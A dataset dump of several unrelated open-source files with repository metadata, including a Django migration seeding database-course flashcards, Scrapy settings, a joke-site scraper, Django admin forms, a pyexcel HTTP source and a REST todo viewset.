'loan(branch-name, loan-number, amount) </br> depositor(customer-name, account-number) </br> borrower(customer-name,' \
' loan-number) </br>'
def add_mock_databases_course(apps, schema_editor):
d, created = Course.objects.get_or_create(name='Databases', description="An introduction to Databases in SQL.")
d.save()
relational_algebra, created = Skill.objects.get_or_create(name="Relational Algebra", course=d)
relational_algebra.save()
relational_calculus, created = Skill.objects.get_or_create(name="Relational Calculus", course=d)
relational_calculus.save()
sql, created = Skill.objects.get_or_create(name="SQL", course=d)
sql.save()
theory, created = Skill.objects.get_or_create(name="Theory", course=d)
theory.save()
c1, created = Card.objects.get_or_create(title='Project', course=d, skill=relational_algebra, level=1, duration=5, view_count=0, content='Symbol: PI </br> Notation: PI_a1,a2,...,ak(r) where a1, a2 are attributes of relation r </br> Result: The relation of k columns obtained by erasing the columns not listed')
c1.save()
c2, created = Card.objects.get_or_create(title='Union', course=d, skill=relational_algebra, level=1, duration=5, view_count=0, content='Symbol: U </br> Notation: r U s where s and r are relations with the same number of attributes, and the attributes are compatible </br> Result: r U s = {t| t is element of r OR t is element of s}')
c2.save()
c3, created = Card.objects.get_or_create(title='Select', course=d, skill=relational_algebra, level=3, duration=5, view_count=0, content='Symbol: SIGMA </br> Notation: SIGMA_p(r) where p is a formula with propositional calculus </br> Result: r = SIGMA_a=b and d > 5 where the rows selected have values for both b and d greater than 5')
c3.save()
c4, created = Card.objects.get_or_create(title='Set Difference', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content='Symbol: - </br> Notation: r - s where r and s are relations with compatible domains </br> Result: r - s = {t| t is element of r AND t is not an element of s}')
c4.save()
c5, created = Card.objects.get_or_create(title='Cartesian Product', course=d, skill=relational_algebra, level=1, duration=5, view_count=0, content='Symbol: X </br> Notation: r X s </br> Result: r X s = {tq| t is element of r AND q is element of s}')
c5.save()
c6, created = Card.objects.get_or_create(title='Set Intersection', course=d, skill=relational_algebra, level=3, duration=5, view_count=0, content='Symbol: INTERSECT </br> Notation: r INTERSECT s </br> Result: r INTERSECT s = {t| t is element of r AND t is element of s}')
c6.save()
c7, created = Card.objects.get_or_create(title='Natural Join', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content='Symbol: JOIN </br> Notation: r JOIN s where r = (A, B, C, D) and s = (E, B, D) </br> Result: PI_r.A, r.B, r.C, r.D, r.E(SIGMA_r.B=s.B, r.D=s.D(r X s))')
c7.save()
    c8, created = Card.objects.get_or_create(title='Division', course=d, skill=relational_algebra, level=1, duration=5, view_count=0, content='Symbol: % </br> Notation: r % s </br> Result: Suited to queries that include "for all"; yields a relation that includes all rows in r where one attribute matches every row in s')
c8.save()
    c9, created = Card.objects.get_or_create(title='RC Practice Question 1', course=d, skill=relational_calculus, level=2, duration=15, view_count=0, content=schema+'</br> Using relational calculus, find the names of all customers having a loan, an account, or both at the bank.')
c9.save()
c10, created = Card.objects.get_or_create(title='RC Practice Question 2', course=d, skill=relational_calculus, level=2, duration=15, view_count=0, content=schema+'</br> Using relational calculus, find the branch-name, loan-number, and amount for loans of value over $1200.')
c10.save()
    c11, created = Card.objects.get_or_create(title='RC Practice Question 3', course=d, skill=relational_calculus, level=2, duration=15, view_count=0, content=schema+'</br> Using relational calculus, find the names of all customers who have a loan at the Perryridge branch, but no account at any branch of the bank.')
c11.save()
    c12, created = Card.objects.get_or_create(title='RC Practice Question 4', course=d, skill=relational_calculus, level=3, duration=15, view_count=0, content=schema+'</br> Using relational calculus, find the names of all customers having a loan from the Perryridge branch and the cities they live in.')
c12.save()
c13, created = Card.objects.get_or_create(title='The select clause', course=d, skill=sql, level=3, duration=5, view_count=0, content='The select clause corresponds to the projection operation in relational algebra. It is used to list the attributes desired in the result of a query. </br> Example: SELECT branch-name FROM loan')
c13.save()
    c14, created = Card.objects.get_or_create(title='The where clause', course=d, skill=sql, level=4, duration=5, view_count=0, content='The where clause corresponds to the selection predicate of relational algebra. It consists of a predicate involving attributes of the relations that appear in the from clause. </br> Example: </br> SELECT loan-number </br> FROM loan </br> WHERE branch-name = "Perryridge" AND amount > 1200')
c14.save()
c15, created = Card.objects.get_or_create(title='The from clause', course=d, skill=sql, level=1, duration=5, view_count=0, content='The from clause corresponds to the cartesian product operation in relational algebra. It lists the relations to be scanned in the evaluation of the expression. </br> Example: </br> SELECT * </br> FROM borrower, loan')
c15.save()
    c16, created = Card.objects.get_or_create(title='String operations', course=d, skill=sql, level=5, duration=5, view_count=0, content='SQL includes a string-matching operator for comparisons on character strings. Patterns are described using %, which matches any substring, and _, which matches any character. </br> Example: </br> SELECT customer-name </br> FROM customer </br> WHERE customer-name LIKE "%Main%" </br> finds all customers who live on a street containing the substring Main.')
c16.save()
    c17, created = Card.objects.get_or_create(title='Ordering the display of tuples', course=d, skill=sql, level=3, duration=5, view_count=0, content='Ascending order is default, but "desc" can be used to reverse the order ("asc" for ascending). </br> Example: SELECT DISTINCT customer-name </br> FROM borrower, loan </br> WHERE borrower.loan-number = loan.loan-number AND branch-name = "Perryridge" </br> ORDER BY customer-name')
c17.save()
c18, created = Card.objects.get_or_create(title='Aggregate functions ', course=d, skill=sql, level=2, duration=5, view_count=0, content='Functions that operate on the multiset of values of a column of a relation, and return a value. </br> Operations: </br> avg = average value </br> min = minimum value </br> max = maximum value </br> sum = sum of values </br> count = number of values')
c18.save()
c19, created = Card.objects.get_or_create(title='SQL Practice Problem 1', course=d, skill=sql, level=2, duration=10, view_count=0, content='Using SQL, find the number of tuples in the customer relation')
c19.save()
    c20, created = Card.objects.get_or_create(title='SQL Practice Problem 2', course=d, skill=sql, level=2, duration=10, view_count=0, content='Using SQL, find the average account balance at the Perryridge branch.')
c20.save()
    c21, created = Card.objects.get_or_create(title='Group by', course=d, skill=sql, level=2, duration=5, view_count=0, content='The group by operator allows aggregate functions to be performed on some subset of the relation. Example: Find the number of depositors for each branch. </br> SELECT branch-name, COUNT(DISTINCT customer-name) </br> FROM depositor, account </br> WHERE depositor.account-number = account.account-number </br> GROUP BY branch-name')
c21.save()
    c21, created = Card.objects.get_or_create(title='Having clause', course=d, skill=sql, level=2, duration=5, view_count=0, content='Predicates of the having clause are applied after the formation of groups. Example: Find the names of all branches where the average balance is more than $1200. </br> SELECT branch-name, AVG(balance) </br> FROM account </br> GROUP BY branch-name </br> HAVING AVG(balance) > 1200')
c21.save()
    c27, created = Card.objects.get_or_create(title='SQL Practice Problem 3', course=d, skill=sql, level=2, duration=10, view_count=0, content=schema+'</br> Using SQL, find the names of all customers who have a loan, an account, or both, from the bank.' )
c27.save()
c28, created = Card.objects.get_or_create(title='RA Practice Problem 1', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content=schema+'</br> Using relational algebra, find the loan number for each loan of an amount greater than $1200.' )
c28.save()
    c29, created = Card.objects.get_or_create(title='RA Practice Problem 2', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content=schema+'</br> Using relational algebra, find the names of all customers who have a loan, an account, or both, from the bank.' )
c29.save()
    c30, created = Card.objects.get_or_create(title='RA Practice Problem 3', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content=schema+'</br> Using relational algebra, find the names of all customers who have a loan at the Perryridge branch.' )
c30.save()
c31, created = Card.objects.get_or_create(title='RA Practice Problem 4', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content=schema+'</br> Using relational algebra, find all customers who have an account at all branches located in Brooklyn.' )
c31.save()
    c32, created = Card.objects.get_or_create(title='Foreign key constraint', course=d, skill=theory, level=2, duration=10, view_count=0, content='Foreign key is used to link two tables together. Constraints on it prevent actions that would destroy links between tables and prevent invalid data from being inserted into the foreign key column because it has to be one of the values contained in the table it points to.')
c32.save()
c33, created = Card.objects.get_or_create(title='Unique constraint', course=d, skill=theory, level=2, duration=10, view_count=0, content='Unique constraint guarantees that each value in a column is unique.')
c33.save()
c34, created = Card.objects.get_or_create(title='Not null constraint', course=d, skill=theory, level=2, duration=10, view_count=0, content='Not null guarantees that the values in a column are not null.')
c34.save()
class Migration(migrations.Migration):
dependencies = [
('app', '0002_mock_users'),
]
operations = [
migrations.RunPython(add_mock_databases_course)
]
|
[
"MbMv2017"
] |
MbMv2017
|
41c8693e05e937b38bcf53526df92cf7209d924d
|
59043eaa3e8e437901a81960619828806d894c1c
|
/venv/Lib/site-packages/boto3-stubs/resources/action.pyi
|
572289c1ebb96340a28e80ed94d14f24dd6ee9b2
|
[] |
no_license
|
erschese/Udacity_Project_3_AWS
|
7e06b2ca228c1ea84cb169f184a83227f39ba754
|
c40813e135f0fb15c64e769fd36f5e413b77e078
|
refs/heads/master
| 2022-12-31T10:03:14.222790
| 2020-10-25T08:47:49
| 2020-10-25T08:47:49
| 307,058,511
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,354
|
pyi
|
# pylint: disable=unused-argument,multiple-statements,super-init-not-called
import logging
from typing import List, Dict, Any, Union, Callable
from botocore.hooks import BaseEventHooks
from boto3.resources.model import Action, Waiter
from boto3.resources.factory import ResourceFactory
from boto3.resources.base import ServiceResource
from boto3.resources.collection import ResourceCollection
from boto3.utils import ServiceContext
logger: logging.Logger
class ServiceAction:
def __init__(
self,
action_model: Action,
factory: ResourceFactory = ...,
service_context: ServiceContext = ...,
) -> None: ...
def __call__(
self, parent: ServiceResource, *args: Any, **kwargs: Any
) -> Union[ServiceResource, List[ServiceResource], Dict[str, Any]]: ...
class BatchAction(ServiceAction):
def __call__(self, parent: ResourceCollection, *args: Any, **kwargs: Any) -> List[Dict]: ...
class WaiterAction:
def __init__(self, waiter_model: Waiter, waiter_resource_name: str) -> None: ...
def __call__(self, parent: ServiceResource, *args: Any, **kwargs: Any) -> None: ...
class CustomModeledAction:
def __init__(
self,
action_name: str,
action_model: Dict[str, Any],
function: Callable[..., Any],
event_emitter: BaseEventHooks,
) -> None: ...
|
[
"serschen@yahoo.de"
] |
serschen@yahoo.de
|
d04c5189276ac69b90876d250842817a4b4da3b7
|
e591660cba22e78d2bed0b185aaea41049f440f3
|
/fetch_player_urls/fetch_player_urls/settings.py
|
b8bac30ebb46163ed01785995a6f769869bf8182
|
[] |
no_license
|
Joe-Ferrara/nba-draft-history
|
f4faa86e9bcb0b52b1b7bfa8f134f5f9c64d93b3
|
9aa387f437828c5396cbf777f494db8123cb93e2
|
refs/heads/master
| 2022-11-23T18:02:14.261973
| 2020-07-18T00:06:42
| 2020-07-18T00:06:42
| 275,638,425
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,194
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for fetch_player_urls project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'fetch_player_urls'
SPIDER_MODULES = ['fetch_player_urls.spiders']
NEWSPIDER_MODULE = 'fetch_player_urls.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'fetch_player_urls (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'fetch_player_urls.middlewares.FetchPlayerUrlsSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'fetch_player_urls.middlewares.FetchPlayerUrlsDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'fetch_player_urls.pipelines.FetchPlayerUrlsPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"jferrara90@gmail.com"
] |
jferrara90@gmail.com
|
f03d531ce385545c40a3fe6f1781c9cf8895049e
|
f155652505e491afd6a6f33b2b8ad2881bb022d2
|
/app/xsbk.py
|
4c4e9efda5db28509aa27648f74c96bbe521172f
|
[
"MIT"
] |
permissive
|
yanglgtm/cobweb
|
7dd1287cfaf361bae00e83831a8726968d5cb4a8
|
94092b8144c7f9b8edde1ef9b6b58b46ba07b87f
|
refs/heads/master
| 2022-05-12T06:24:49.916369
| 2017-10-20T10:46:08
| 2017-10-20T10:46:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,330
|
py
|
# Scrape jokes from Qiushibaike (qiushibaike.com)
import sys
sys.path.append('..')
from cobweb.downloader import *
from cobweb.parser import *
import time
import re
def parse_joke(self):
data = self.soup.find_all('div', class_='article block untagged mb15')
content_pattern = re.compile("<div.*?content\">(.*?)<!--(.*?)-->.*?</div>", re.S)
self.content = []
for d in data:
soup_d = BeautifulSoup(str(d), 'html.parser', from_encoding='utf8')
        # username
name = soup_d.h2.string
        # content (text plus timestamp & image)
c = soup_d.find('div', class_='content')
# content = str(c.contents[0]).strip('\n')
# timestamp = str(c.contents[1])
re1 = content_pattern.findall(str(c))
content = re1[0][0].strip('\n').replace('<br>', '\n')
timestamp = re1[0][1]
img = soup_d.find('div', class_='thumb')
if img:
img_src = img.contents[1].contents[1]['src']
content += "[img: %s]" % str(img_src)
        # number of likes
like = soup_d.find('i', class_='number').string
j = "name: %s\ncontent: %s\ntime: %s\nlike: %s" % (str(name), content, time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(int(timestamp))), str(like))
self.content.append(j)
return self
class Sxbk:
def __init__(self):
self.page = 1
self.url = 'http://www.qiushibaike.com/hot/page/'
self.joke_lists = []
self.enable = True
self.downloader = Downloader()
self.parse = Parser(None, parse_joke)
    # download a page
def get_page(self, num=1):
return self.downloader.get(self.url + str(num), header={
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
}, timeout=50)
    # parse jokes into the list
def gen_jokes(self, html):
self.parse.set_html(html)
self.joke_lists += self.parse.parse_content().get_content()
# start
def start(self):
        print('Press Enter to start...')
while self.enable:
n = input()
if n == 'q':
exit()
if len(self.joke_lists) < 2:
html = self.get_page(self.page)
self.gen_jokes(html)
self.page += 1
print(self.joke_lists[0])
del self.joke_lists[0]
s = Sxbk()
s.start()
|
[
"jiangyang33@gmail.com"
] |
jiangyang33@gmail.com
|
7e62bd4245f803eee240c0e728aa73886ec8b2f4
|
da9753df623ce9aeec9bebc8391ad8287b1732d9
|
/AACForm/makeReports/forms/admin_forms.py
|
fd41beb3ad3201f4fef673206822363f3ab67d36
|
[] |
no_license
|
jdboyd-github/AAC-Capstone
|
2caa840bb4a6986c6f96130b67b1a77b6a0a12fd
|
472a6fd487811002a60a7812ae2eef941e7182cc
|
refs/heads/master
| 2023-05-24T05:42:15.632005
| 2021-03-25T18:47:21
| 2021-03-25T18:47:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,940
|
py
|
"""
This file contains forms to administer the website
"""
from django import forms
from makeReports.models import (
Announcement,
College,
DegreeProgram,
Department,
GradGoal,
Report,
Rubric
)
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django_summernote.widgets import SummernoteWidget
from makeReports.choices import POSSIBLE_REQS
from .cleaners import CleanSummer
class UpdateUserForm(forms.Form):
"""
Form to update a pre-existing user by the AAC
"""
aac = forms.BooleanField(label="AAC member",required=False)
department = forms.ModelChoiceField(queryset=Department.active_objects.all().order_by("name"), label="Department", required=False,widget=forms.Select(attrs={'class':'form-control col-6'}))
first_name = forms.CharField(max_length=30,widget=forms.TextInput(attrs={'class':'form-control col-6'}))
last_name = forms.CharField(max_length=150,widget=forms.TextInput(attrs={'class':'form-control col-6'}))
email = forms.CharField(max_length=30,widget=forms.EmailInput(attrs={'class':'form-control col-6'}))
class UserUpdateUserForm(forms.Form):
"""
Form to update a user by the user themselves (fewer permissions)
"""
first_name = forms.CharField(max_length=30, widget=forms.TextInput(attrs={'class':'form-control col-6'}))
last_name = forms.CharField(max_length=150, widget=forms.TextInput(attrs={'class':'form-control col-6'}))
email = forms.CharField(max_length=30, widget=forms.EmailInput(attrs={'class':'form-control col-6'}))
class CreateDepartmentForm(forms.ModelForm):
"""
Form to create new department
"""
class Meta:
"""
Defines the model type, fields, and widgets for use by the ModelForm superclass
"""
model = Department
fields = ['name', 'college']
widgets = {
'name': forms.TextInput(attrs={'class':'form-control col-6'}),
'college': forms.Select(attrs={'class':'form-control col-6'})
}
def __init__(self,*args,**kwargs):
"""
Initializes the form and sets possible colleges to only those which are active
"""
super(CreateDepartmentForm,self).__init__(*args,**kwargs)
self.fields['college'].queryset=College.active_objects.all().order_by("name")
class GenerateReports(forms.Form):
"""
Form to generate reports
"""
year = forms.IntegerField(widget=forms.NumberInput(attrs={'class':'form-control col-6'}))
rubric = forms.ModelChoiceField(queryset=Rubric.objects.order_by('-date'), widget=forms.Select(attrs={'class':'form-control col-6'}))
class MakeNewAccount(UserCreationForm):
"""
Form for the AAC to make a new account
"""
isaac = forms.BooleanField(required=False, label="Account for AAC member?")
department = forms.ModelChoiceField(queryset=Department.active_objects, label="Department", required=False,widget=forms.Select(attrs={'class':'form-control col-6'}))
college = forms.ModelChoiceField(queryset=College.active_objects.all().order_by("name"), label="College",required=False,widget=forms.Select(attrs={'class':'form-control col-6'}))
class Meta:
"""
Defines the model type, fields, and widgets for use by the superclass ModelForm when
creating the form
"""
model = User
fields = ['email','username','password1','password2','isaac','first_name','last_name']
widgets = {
'email': forms.EmailInput(attrs={'class':'form-control col-6'}),
'username': forms.TextInput(attrs={'class':'form-control col-6'}),
'password1': forms.PasswordInput(attrs={'class':'form-control col-6'}),
'password2': forms.PasswordInput(attrs={'class':'form-control col-6'}),
'first_name': forms.TextInput(attrs={'class':'form-control col-6'}),
'last_name': forms.TextInput(attrs={'class':'form-control col-6'})
}
def is_valid(self):
valid = super().is_valid()
if not valid:
return valid
if (
self.cleaned_data["college"] and self.cleaned_data["college"]!=""
) and (
not self.cleaned_data["department"] or self.cleaned_data["department"]==""
):
            self.add_error("department", "If a college is specified, a department must also be specified.")
return False
return True
def save(self, commit=True):
"""
Upon creating a new user, both the Django User type and custom profile type must be created
Keyword Args:
commit (bool) : whether to actually save user to database
Returns:
user, profile : user and profile created
"""
user = super(MakeNewAccount, self).save(commit=True)
profile = user.profile
profile.aac = self.cleaned_data['isaac']
profile.department=self.cleaned_data['department']
user.save()
profile.save()
return user, profile
class AnnouncementForm(CleanSummer,forms.ModelForm):
"""
Form to create announcement by AAC
"""
text = forms.CharField(widget=SummernoteWidget(attrs={'style':'width:750px'}),label="Announcement")
summer_max_length = 2000
class Meta:
"""
Defines the model type, widgets, and fields for use by the ModelForm superclass to build the form
"""
model = Announcement
widgets = {
'expiration': forms.SelectDateWidget(),
}
fields = ['text','expiration']
class GradGoalForm(CleanSummer,forms.ModelForm):
"""
Form to create new graduate goal
"""
text = forms.CharField(widget=SummernoteWidget(attrs={'style':'width:750px'}),label="Goal text: ")
summer_max_length = 600
class Meta:
"""
Defines the model type and fields for the ModelForm superclass to use to build the form
"""
model = GradGoal
fields = ['text']
class GradGoalEditForm(CleanSummer,forms.ModelForm):
"""
Form to create edit graduate goal, including possibly archiving it
"""
text = forms.CharField(widget=SummernoteWidget(attrs={'style':'width:750px'}),label="Goal text: ")
summer_max_length = 600
class Meta:
"""
Defines the model type and fields for the ModelForm superclass to use to build the form
"""
model = GradGoal
fields = ['active','text']
class CreateReportByDept(forms.ModelForm):
"""
Form to create new report via a link that already gives department (but not degree program)
"""
class Meta:
"""
Defines the model type, fields, labels, and widgets for the superclass ModelForm
to use to build the form.
"""
model = Report
fields = ['year', 'degreeProgram']
labels = {
'degreeProgram': "Degree Program"
}
widgets = {
'year': forms.NumberInput(attrs={'class':'form-control col-6'}),
'degreeProgram': forms.Select(attrs={'class':'form-control col-6'})
}
def __init__(self,*args,**kwargs):
"""
Initializes form, sets the degree program options by the keyword argument and sets rubric options
Keyword Args:
dept (Department): department object to pick degree programs from
"""
dept = Department.objects.get(pk=kwargs.pop('dept'))
super(CreateReportByDept, self).__init__(*args, **kwargs)
self.fields['degreeProgram'].queryset = DegreeProgram.objects.filter(department=dept)
self.fields['rubric'] = forms.ModelChoiceField(queryset=Rubric.objects.all().order_by("-date"))
class CreateReportByDPForm(forms.ModelForm):
"""
Form to create report where degree program is already picked
"""
class Meta:
"""
Defines the model type, fields and widgets for the ModelForm superclass to
use to build the form
"""
model = Report
fields = ['year']
widgets = {
'year': forms.NumberInput(attrs={'class':'form-control col-6'})
}
def __init__(self,*args,**kwargs):
"""
Initializes form and sets rubric options
"""
super(CreateReportByDPForm,self).__init__(*args,**kwargs)
self.fields['rubric'] = forms.ModelChoiceField(queryset=Rubric.objects.all().order_by("-date"))
class CreateDPByDept(forms.ModelForm):
"""
Form to create degree program where department is given
"""
class Meta:
"""
Defines the model, fields, labels, and widgets for the ModelForm superclass
to use to make a form
"""
model = DegreeProgram
fields = ['name','level','cycle','startingYear']
labels = {
'name': "Name",
'level': "Level",
'cycle': "Number of years between automatically assigned reports (put 0 or leave blank if there is no regular cycle)",
'startingYear': "The first year report is assigned for cycle (leave blank if no cycle)"
}
widgets = {
'name': forms.TextInput(attrs={'class':'form-control col-6'}),
'level': forms.Select(attrs={'class':'form-control col-4'}),
'cycle': forms.NumberInput(attrs={'class':'form-control col-3','placeholder':'Cycle length'}),
'startingYear': forms.NumberInput(attrs={'class':'form-control col-3', 'placeholder':'Starting year'})
}
class RequiredReportFieldsForm(forms.Form):
"""
Form to change which fields are required to submit a report
"""
def __init__(self, *args, **kwargs):
"""
Creates the form fields from the list in POSSIBLE_REQS (from choices)
"""
super().__init__(*args,**kwargs)
for req in POSSIBLE_REQS:
self.fields[req[0]] = forms.BooleanField(required=False, label=req[1])
|
[
"smccarty@unomaha.edu"
] |
smccarty@unomaha.edu
|
de67995034fb569460fc19fdaa1b4c239db4d86d
|
01edd1a8172ef0bac49e3bf33b590e5c21b61b12
|
/pyexcel/plugins/sources/http.py
|
50e27c57f3c6e9a3778f92c7b105c9874c1945d4
|
[
"BSD-3-Clause"
] |
permissive
|
stephenrauch/pyexcel
|
89dc2868fc8f64bd6ec5eec30a0e2e8060e43fc0
|
9e4b5645e8639e874f46f7d3d846c13524f5e3e2
|
refs/heads/master
| 2020-12-31T00:30:39.208207
| 2017-03-28T23:36:32
| 2017-03-28T23:36:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,790
|
py
|
"""
pyexcel.source.http
~~~~~~~~~~~~~~~~~~~
Representation of http sources
:copyright: (c) 2015-2017 by Onni Software Ltd.
:license: New BSD License
"""
from pyexcel._compact import request, PY2
from pyexcel.source import Source
import pyexcel.constants as constants
import pyexcel.internal.parser_meta as parsers
from . import params
_xlsx = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
FILE_TYPE_MIME_TABLE = {
"text/csv": "csv",
"text/tab-separated-values": "tsv",
"application/vnd.oasis.opendocument.spreadsheet": "ods",
"application/vnd.ms-excel": "xls",
_xlsx: "xlsx",
"application/vnd.ms-excel.sheet.macroenabled.12": "xlsm"
}
class HttpSource(Source):
"""
Multiple sheet data source via http protocol
"""
fields = [params.URL]
targets = (constants.SHEET, constants.BOOK)
actions = (constants.READ_ACTION,)
attributes = [params.URL]
key = params.URL
def __init__(self, url=None, **keywords):
self.__url = url
self.__keywords = keywords
def get_data(self):
f = request.urlopen(self.__url)
info = f.info()
if PY2:
mime_type = info.type
else:
mime_type = info.get_content_type()
file_type = FILE_TYPE_MIME_TABLE.get(mime_type, None)
if file_type is None:
file_type = _get_file_type_from_url(self.__url)
parser = parsers.get_parser(file_type)
content = f.read()
sheets = parser.parse_file_content(content,
**self.__keywords)
return sheets
def get_source_info(self):
return self.__url, None
def _get_file_type_from_url(url):
extension = url.split('.')
return extension[-1]
|
[
"wangc_2011@hotmail.com"
] |
wangc_2011@hotmail.com
|
1d76b76cbfbfd483677ffc3702ea97a576b759e2
|
c661708813284f1b9059d8e2aac796d8eb9f9a66
|
/LED-Projects/blinkSignal.py
|
dfe61279606125184474400d936b66850d62cf86
|
[] |
no_license
|
KatieKrupczak/Raspberry-Pi-Projects
|
1a48a0cdb479f70920ad03e457be19e911ef9a5d
|
ef3d616c93f21f55d192f24f7771ccf21343acf6
|
refs/heads/main
| 2023-07-02T04:44:29.263592
| 2021-08-10T20:50:41
| 2021-08-10T20:50:41
| 385,388,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 91
|
py
|
from gpiozero import LED
from signal import pause
red = LED(2)
red.blink(0.5,0.5)
pause()
|
[
"katie@krupczak.org"
] |
katie@krupczak.org
|
32b7842be9c70645a3fed1f06460c58442dff64c
|
273f94d2707ef91104c74cb3de67a4d3049b3308
|
/10_decorator/adder.py
|
f24bb0db65783fd169e6a9eb07d32f73cc0bc8fa
|
[] |
no_license
|
sonicfrog-z/python_practice
|
b1ff8f22bff7c6f873afcb5b8c0fb9aa3d27ce50
|
62b7f094b235204c12566078b40c84938632b192
|
refs/heads/master
| 2020-09-29T11:28:35.484429
| 2019-12-25T04:57:36
| 2019-12-25T04:57:36
| 227,029,845
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 241
|
py
|
class Adder:
def __init__(self, base):
self._base = base
def __call__(self, value):
return self._base + value
if __name__ == '__main__':
adder5 = Adder(5)
print(adder5(10))
print(adder5(3))
|
[
"noreply@github.com"
] |
sonicfrog-z.noreply@github.com
|
135c752690ac2102b5014d59703e71a4b285792d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_circumscribed.py
|
855995f3ac2c7fd589f34f7fe49081d6facfa5ce
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
from xai.brain.wordbase.verbs._circumscribe import _CIRCUMSCRIBE
# class header
class _CIRCUMSCRIBED(_CIRCUMSCRIBE, ):
def __init__(self,):
_CIRCUMSCRIBE.__init__(self)
self.name = "CIRCUMSCRIBED"
self.specie = 'verbs'
self.basic = "circumscribe"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
d1d059fd1b5afce933aad5bebd15a1c4f23d5d84
|
0a86a749db830a4e37ea56bee5b85608f362f9ca
|
/src/todo/views.py
|
4294bac19360252e0e4a36e13326398b5e6d3e4b
|
[] |
no_license
|
kalpitan/todobackend
|
ce1f5135055098f8edbc0ed98112e7b0bf7f3a60
|
d7ef3cf878309cb0ecbf5e950960012a6241342c
|
refs/heads/master
| 2020-06-11T04:43:24.146800
| 2016-12-10T09:16:49
| 2016-12-10T09:16:49
| 76,102,365
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 813
|
py
|
from django.shortcuts import render
from todo.models import TodoItem
from todo.serializers import TodoItemSerializer
from rest_framework import status
from rest_framework import viewsets
from rest_framework.reverse import reverse
from rest_framework.decorators import list_route
from rest_framework.response import Response
# Create your views here.
class TodoItemViewSet(viewsets.ModelViewSet):
queryset = TodoItem.objects.all()
serializer_class = TodoItemSerializer
def perform_create(self, serializer):
instance = serializer.save()
instance.url = reverse('todoitem-detail', args=[instance.pk], request=self.request)
instance.save()
    def delete(self, request):
        # bulk-delete every item; 204 must go in the `status` kwarg,
        # otherwise the status code becomes the response body
        TodoItem.objects.all().delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
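# Added sketch (hedged): a DefaultRouter registration like the one
# below, normally placed in the project's urls.py rather than here, is
# the usual way to expose a ModelViewSet over REST.
from rest_framework.routers import DefaultRouter

router = DefaultRouter()
router.register(r'todos', TodoItemViewSet)
urlpatterns = router.urls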
|
[
"kalpitan@gmail.com"
